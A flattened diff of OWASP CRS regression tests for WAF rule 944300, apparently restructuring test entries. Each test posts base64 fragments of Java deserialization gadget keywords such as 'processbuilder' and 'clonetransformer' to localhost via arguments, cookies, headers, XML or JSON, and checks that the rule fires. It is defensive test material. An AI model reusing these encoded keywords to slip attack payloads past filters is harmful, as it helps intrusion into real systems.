stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 45 desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_id: 46 desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy=test" + output: + log_contains: "id \"944300\"" + - test_id: 47 desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb2Nlc3NidWlsZGVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb2Nlc3NidWlsZGVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 48 desc: "Cookie name includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb2Nlc3NidWlsZGVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb2Nlc3NidWlsZGVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 49 desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb2Nlc3NidWlsZGVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb2Nlc3NidWlsZGVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 50 desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 51 desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_id: 52 desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_id: 53 desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_id: 54 desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" + output: + log_contains: "id \"944300\"" + - test_id: 55 desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 56 desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_id: 57 desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg=test" + output: + log_contains: "id \"944300\"" + - test_id: 58 desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm9jZXNzYnVpbGRlcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm9jZXNzYnVpbGRlcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 59 desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm9jZXNzYnVpbGRlcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm9jZXNzYnVpbGRlcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 60 desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm9jZXNzYnVpbGRlcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm9jZXNzYnVpbGRlcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 61 desc: "XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 62 desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_id: 63 desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_id: 64 desc: "Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_id: 65 desc: "Content-Type application/json arg value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" + output: + log_contains: "id \"944300\"" + - test_id: 66 desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 67 desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 68 desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_id: 69 desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 70 desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - 